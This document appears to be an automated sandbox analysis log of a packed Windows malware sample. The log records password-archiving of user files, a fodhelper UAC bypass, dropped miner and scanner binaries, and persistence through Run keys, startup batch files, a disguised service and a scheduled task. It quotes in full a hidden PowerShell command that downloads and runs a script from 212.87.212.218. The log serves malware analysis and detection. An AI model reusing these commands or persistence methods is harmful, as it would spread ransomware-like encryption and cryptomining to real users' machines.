          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\System32\fodhelper.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2EE14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,56_2_00007FF650B2EE14
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B5AEBC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,SetSuspendState,ExitWindowsEx,56_2_00007FF650B5AEBC
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ExecutablePath FROM Win32_Process
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ExecutablePath FROM Win32_Process
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ExecutablePath FROM Win32_Process
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ExecutablePath FROM Win32_Process
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ExecutablePath FROM Win32_Process
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ExecutablePath FROM Win32_Process
          Source: C:\Users\user\Desktop\jxatBamQnK.exeFile created: C:\Windows\Temp\flag_bypassUAC.flagJump to behavior
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B33548 GetDiskFreeSpaceExW,56_2_00007FF650B33548
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6836:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_01
          Source: C:\Windows\Temp\encrypt.exeMutant created: \Sessions\1\BaseNamedObjects\Global\1c240d5cac57032ce1f1f2cd058795b8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_01
          Source: C:\Users\user\Desktop\jxatBamQnK.exeMutant created: \Sessions\1\BaseNamedObjects\Global\d9ab7fc1886f82dc05eb74a5abd0b831
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3164:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4956:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_01
          Source: C:\Windows\Temp\scan.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ea697277b6e26029576a9475cb715e42
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2952:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3244:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_01
          Source: C:\Windows\Temp\daemon.exeMutant created: \Sessions\1\BaseNamedObjects\Global\8308f4a16328efe1a69f31c4d2aed8dc
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_01
          Source: scan.exeString found in binary or memory: wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)expression of type '%s' cannot be range of a comprehension (must be list, map, or dynamic)http2: server sent GOAWAY and closed the connection; LastStreamID=%v, ErrCode=%v, debug=%q22,80,81,135,139,443,44
          Source: scan.exeString found in binary or memory: wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)expression of type '%s' cannot be range of a comprehension (must be list, map, or dynamic)http2: server sent GOAWAY and closed the connection; LastStreamID=%v, ErrCode=%v, debug=%q22,80,81,135,139,443,44
          Source: scan.exeString found in binary or memory: zecompressed name in SRV resource dataconverting NULL to %s is unsupportedcrypto/cipher: input not full blockscrypto/sha1: invalid hash state sizecrypto/sha512: invalid hash functiondid not find expected <stream-start>did not find expected version numberdocume
          Source: scan.exeString found in binary or memory: r untyped args url: %s$htmltemplate_%s.%s READONLY(BlockDos.net)(CNOAOASESSID)(Coding Pages)(McuR5-min.js)(easSessionId)(i_like_gitea)(nagios admin)(zfoausername)(zhuji.360.cn)-thread limit .WithDeadline(.in-addr.arpa.190734863281257wtusr.ceye.io95
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociationsJump to behavior
          Source: jxatBamQnK.exeStatic file information: File size 1699840 > 1048576
          Source: jxatBamQnK.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x19ec00
          Source: jxatBamQnK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000038.00000000.462772257.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000003C.00000000.472066491.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000003C.00000002.481443407.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000041.00000000.475181488.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000041.00000002.488837565.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000045.00000000.481048099.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000045.00000002.491894512.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004A.00000000.488573417.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004A.00000002.500694100.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004D.00000000.492770561.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004D.00000002.510319504.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004E.00000002.506482905.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004E.00000000.492480709.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000051.00000002.514894520.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000051.00000000.494359364.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\"http://212.87.212.218/doanlowd.txt\")
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')Jump to behavior
          Source: jxatBamQnK.exeStatic PE information: section name: UPX2
          Source: encrypt.exe.0.drStatic PE information: section name: UPX2
          Source: daemon.exe.32.drStatic PE information: section name: UPX2
          Source: scan.exe.35.drStatic PE information: section name: UPX2
          Source: rar.exe.38.drStatic PE information: section name: _RDATA
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1

          Persistence and Installation Behavior

          barindex
          Uses cmd line tools excessively to alter registry or file data
          Source: C:\Windows\System32\fodhelper.exeProcess created: reg.exe
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: reg.exe
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: reg.exe
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: reg.exe
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: reg.exeJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: reg.exeJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\Temp\daemon.exeFile created: C:\Windows\Temp\scan.exeJump to dropped file
          Source: C:\Windows\Temp\encrypt.exeFile created: C:\Windows\Temp\rar.exeJump to dropped file
          Source: C:\Users\user\Desktop\jxatBamQnK.exeFile created: C:\Windows\Temp\encrypt.exeJump to dropped file
          Source: C:\Windows\Temp\daemon.exeFile created: C:\Windows\Temp\miner.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\daemon.exeJump to dropped file
          Source: C:\Windows\Temp\daemon.exeFile created: C:\Windows\Temp\scan.exeJump to dropped file
          Source: C:\Windows\Temp\encrypt.exeFile created: C:\Windows\Temp\rar.exeJump to dropped file
          Source: C:\Users\user\Desktop\jxatBamQnK.exeFile created: C:\Windows\Temp\encrypt.exeJump to dropped file
          Source: C:\Windows\Temp\daemon.exeFile created: C:\Windows\Temp\miner.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\daemon.exeJump to dropped file

          Boot Survival

          barindex
          Drops script or batch files to the startup folder
          Source: C:\Users\user\Desktop\jxatBamQnK.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.batJump to dropped file
          Source: C:\Users\user\Desktop\jxatBamQnK.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.batJump to dropped file
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")"
          Creates an autostart registry key pointing to binary in C:\Windows
          Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registryKeyNameJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeFile created: c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.batJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeFile created: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.batJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeFile created: c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.batJump to behavior
          Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registryKeyNameJump to behavior
          Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registryKeyNameJump to behavior
          Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registryKeyNameJump to behavior
          Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registryKeyNameJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\sc.exe sc create msupdate binpath= C:\Windows\Temp\C:\Windows\Temp\daemon.exe
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
